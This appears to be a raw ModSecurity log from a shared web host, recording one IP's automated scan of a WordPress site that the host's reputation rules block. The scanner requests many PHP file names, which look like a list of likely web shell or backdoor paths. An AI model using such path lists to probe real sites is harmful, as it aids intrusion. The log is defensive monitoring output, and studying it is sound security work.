[Tue May 26 14:14:14.612348 2026] [security2:error] [pid 598542:tid 598791] [client 20.151.112.53:25424] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/buttons/"] [unique_id "ahVdXv4iWyZxnXeAW3JAigAAAHc"]
[Tue May 26 14:14:14.686281 2026] [security2:error] [pid 598542:tid 598776] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdXv4iWyZxnXeAW3JAjgAAAGg"]
[Tue May 26 14:14:14.783320 2026] [security2:error] [pid 598542:tid 598673] [client 20.151.112.53:25424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahVdXv4iWyZxnXeAW3JAjwAAAAE"]
[Tue May 26 14:14:14.783463 2026] [security2:error] [pid 598542:tid 598673] [client 20.151.112.53:25424] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahVdXv4iWyZxnXeAW3JAjwAAAAE"]
[Tue May 26 14:14:14.934972 2026] [security2:error] [pid 598542:tid 598693] [client 20.151.112.53:51869] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahVdXv4iWyZxnXeAW3JAkAAAABU"]
[Tue May 26 14:14:14.935107 2026] [security2:error] [pid 598542:tid 598693] [client 20.151.112.53:51869] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahVdXv4iWyZxnXeAW3JAkAAAABU"]
[Tue May 26 14:14:14.953582 2026] [security2:error] [pid 598542:tid 598760] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdXv4iWyZxnXeAW3JAiQAAAFg"]
[Tue May 26 14:14:15.361687 2026] [security2:error] [pid 598542:tid 598714] [client 20.151.112.53:8436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahVdX_4iWyZxnXeAW3JAmAAAACo"]
[Tue May 26 14:14:15.361790 2026] [security2:error] [pid 598542:tid 598714] [client 20.151.112.53:8436] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahVdX_4iWyZxnXeAW3JAmAAAACo"]
[Tue May 26 14:14:15.634466 2026] [security2:error] [pid 598542:tid 598773] [client 20.151.112.53:39511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahVdX_4iWyZxnXeAW3JAoAAAAGU"]
[Tue May 26 14:14:15.634571 2026] [security2:error] [pid 598542:tid 598773] [client 20.151.112.53:39511] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahVdX_4iWyZxnXeAW3JAoAAAAGU"]
[Tue May 26 14:14:15.783311 2026] [security2:error] [pid 598542:tid 598738] [client 20.151.112.53:22188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/puc.php"] [unique_id "ahVdX_4iWyZxnXeAW3JArAAAAEI"]
[Tue May 26 14:14:15.783421 2026] [security2:error] [pid 598542:tid 598738] [client 20.151.112.53:22188] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/puc.php"] [unique_id "ahVdX_4iWyZxnXeAW3JArAAAAEI"]
[Tue May 26 14:14:15.933221 2026] [security2:error] [pid 598542:tid 598749] [client 20.151.112.53:39535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVdX_4iWyZxnXeAW3JAuAAAAE0"]
[Tue May 26 14:14:15.933353 2026] [security2:error] [pid 598542:tid 598749] [client 20.151.112.53:39535] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVdX_4iWyZxnXeAW3JAuAAAAE0"]
[Tue May 26 14:14:16.079565 2026] [security2:error] [pid 598542:tid 598784] [client 20.151.112.53:43307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahVdYP4iWyZxnXeAW3JAuQAAAHA"]
[Tue May 26 14:14:16.079690 2026] [security2:error] [pid 598542:tid 598784] [client 20.151.112.53:43307] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahVdYP4iWyZxnXeAW3JAuQAAAHA"]
[Tue May 26 14:14:16.227005 2026] [security2:error] [pid 598542:tid 598672] [client 20.151.112.53:39544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahVdYP4iWyZxnXeAW3JAvQAAAAA"]
[Tue May 26 14:14:16.227116 2026] [security2:error] [pid 598542:tid 598672] [client 20.151.112.53:39544] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahVdYP4iWyZxnXeAW3JAvQAAAAA"]
[Tue May 26 14:14:16.406175 2026] [security2:error] [pid 598542:tid 598673] [client 20.151.112.53:4854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/p.php"] [unique_id "ahVdYP4iWyZxnXeAW3JAxAAAAAE"]
[Tue May 26 14:14:16.406308 2026] [security2:error] [pid 598542:tid 598673] [client 20.151.112.53:4854] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/p.php"] [unique_id "ahVdYP4iWyZxnXeAW3JAxAAAAAE"]
[Tue May 26 14:14:16.585360 2026] [security2:error] [pid 598542:tid 598786] [client 20.151.112.53:43317] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/Requests/"] [unique_id "ahVdYP4iWyZxnXeAW3JAzgAAAHI"]
[Tue May 26 14:14:16.659084 2026] [security2:error] [pid 598542:tid 598711] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdYP4iWyZxnXeAW3JAzwAAACc"]
[Tue May 26 14:14:16.760512 2026] [security2:error] [pid 598542:tid 598795] [client 20.151.112.53:43317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahVdYP4iWyZxnXeAW3JA0wAAAHs"]
[Tue May 26 14:14:16.760620 2026] [security2:error] [pid 598542:tid 598795] [client 20.151.112.53:43317] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahVdYP4iWyZxnXeAW3JA0wAAAHs"]
[Tue May 26 14:14:16.930003 2026] [security2:error] [pid 598542:tid 598742] [client 20.151.112.53:22155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahVdYP4iWyZxnXeAW3JA1wAAAEY"]
[Tue May 26 14:14:16.930114 2026] [security2:error] [pid 598542:tid 598742] [client 20.151.112.53:22155] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahVdYP4iWyZxnXeAW3JA1wAAAEY"]
[Tue May 26 14:14:17.136317 2026] [security2:error] [pid 598542:tid 598729] [client 20.151.112.53:8433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA2wAAADk"]
[Tue May 26 14:14:17.136447 2026] [security2:error] [pid 598542:tid 598729] [client 20.151.112.53:8433] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA2wAAADk"]
[Tue May 26 14:14:17.291174 2026] [security2:error] [pid 598542:tid 598738] [client 20.151.112.53:39503] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA4wAAAEI"]
[Tue May 26 14:14:17.291291 2026] [security2:error] [pid 598542:tid 598738] [client 20.151.112.53:39503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA4wAAAEI"]
[Tue May 26 14:14:17.291397 2026] [security2:error] [pid 598542:tid 598738] [client 20.151.112.53:39503] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA4wAAAEI"]
[Tue May 26 14:14:17.454783 2026] [security2:error] [pid 598542:tid 598697] [client 20.151.112.53:35452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA6wAAABk"]
[Tue May 26 14:14:17.454880 2026] [security2:error] [pid 598542:tid 598697] [client 20.151.112.53:35452] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA6wAAABk"]
[Tue May 26 14:14:17.602240 2026] [security2:error] [pid 598542:tid 598790] [client 20.151.112.53:22826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA7AAAAHY"]
[Tue May 26 14:14:17.602349 2026] [security2:error] [pid 598542:tid 598790] [client 20.151.112.53:22826] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA7AAAAHY"]
[Tue May 26 14:14:17.824427 2026] [security2:error] [pid 598542:tid 598739] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA6QAAAEM"]
[Tue May 26 14:14:17.833857 2026] [security2:error] [pid 598542:tid 598701] [client 20.151.112.53:22153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA_AAAAB0"]
[Tue May 26 14:14:17.833990 2026] [security2:error] [pid 598542:tid 598701] [client 20.151.112.53:22153] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA_AAAAB0"]
[Tue May 26 14:14:17.985855 2026] [security2:error] [pid 598542:tid 598694] [client 20.151.112.53:39519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA_gAAABY"]
[Tue May 26 14:14:17.985980 2026] [security2:error] [pid 598542:tid 598694] [client 20.151.112.53:39519] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahVdYf4iWyZxnXeAW3JA_gAAABY"]
[Tue May 26 14:14:18.129779 2026] [security2:error] [pid 598542:tid 598768] [client 20.151.112.53:25459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBAgAAAGA"]
[Tue May 26 14:14:18.129907 2026] [security2:error] [pid 598542:tid 598768] [client 20.151.112.53:25459] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBAgAAAGA"]
[Tue May 26 14:14:18.285655 2026] [security2:error] [pid 598542:tid 598713] [client 20.151.112.53:42741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/f6.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBBwAAACk"]
[Tue May 26 14:14:18.285790 2026] [security2:error] [pid 598542:tid 598713] [client 20.151.112.53:42741] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/f6.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBBwAAACk"]
[Tue May 26 14:14:18.465494 2026] [security2:error] [pid 598542:tid 598772] [client 20.151.112.53:52502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBCgAAAGQ"]
[Tue May 26 14:14:18.465651 2026] [security2:error] [pid 598542:tid 598772] [client 20.151.112.53:52502] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBCgAAAGQ"]
[Tue May 26 14:14:18.639068 2026] [security2:error] [pid 598542:tid 598769] [client 20.151.112.53:8433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBFAAAAGE"]
[Tue May 26 14:14:18.639157 2026] [security2:error] [pid 598542:tid 598769] [client 20.151.112.53:8433] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBFAAAAGE"]
[Tue May 26 14:14:18.826254 2026] [security2:error] [pid 598542:tid 598760] [client 20.151.112.53:39495] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBHQAAAFg"]
[Tue May 26 14:14:18.826393 2026] [security2:error] [pid 598542:tid 598760] [client 20.151.112.53:39495] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBHQAAAFg"]
[Tue May 26 14:14:18.987971 2026] [security2:error] [pid 598542:tid 598573] [remote 51.68.87.127:57980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.87.68.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVdYv4iWyZxnXeAW3JBGwAAZh4"]
[Tue May 26 14:14:19.008221 2026] [security2:error] [pid 598542:tid 598726] [client 20.151.112.53:8428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/themes/index.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBJAAAADY"]
[Tue May 26 14:14:19.008357 2026] [security2:error] [pid 598542:tid 598726] [client 20.151.112.53:8428] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/themes/index.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBJAAAADY"]
[Tue May 26 14:14:19.168150 2026] [security2:error] [pid 598542:tid 598773] [client 20.151.112.53:42704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-blog.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBJQAAAGU"]
[Tue May 26 14:14:19.168235 2026] [security2:error] [pid 598542:tid 598773] [client 20.151.112.53:42704] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-blog.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBJQAAAGU"]
[Tue May 26 14:14:19.340586 2026] [security2:error] [pid 598542:tid 598733] [client 20.151.112.53:22795] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/js/jquery/"] [unique_id "ahVdY_4iWyZxnXeAW3JBLAAAAD0"]
[Tue May 26 14:14:19.424902 2026] [security2:error] [pid 598542:tid 598778] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdY_4iWyZxnXeAW3JBMAAAAGo"]
[Tue May 26 14:14:19.504891 2026] [security2:error] [pid 598542:tid 598688] [client 20.151.112.53:22795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBNAAAABA"]
[Tue May 26 14:14:19.504990 2026] [security2:error] [pid 598542:tid 598688] [client 20.151.112.53:22795] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBNAAAABA"]
[Tue May 26 14:14:19.655664 2026] [security2:error] [pid 598542:tid 598694] [client 20.151.112.53:8399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBOAAAABY"]
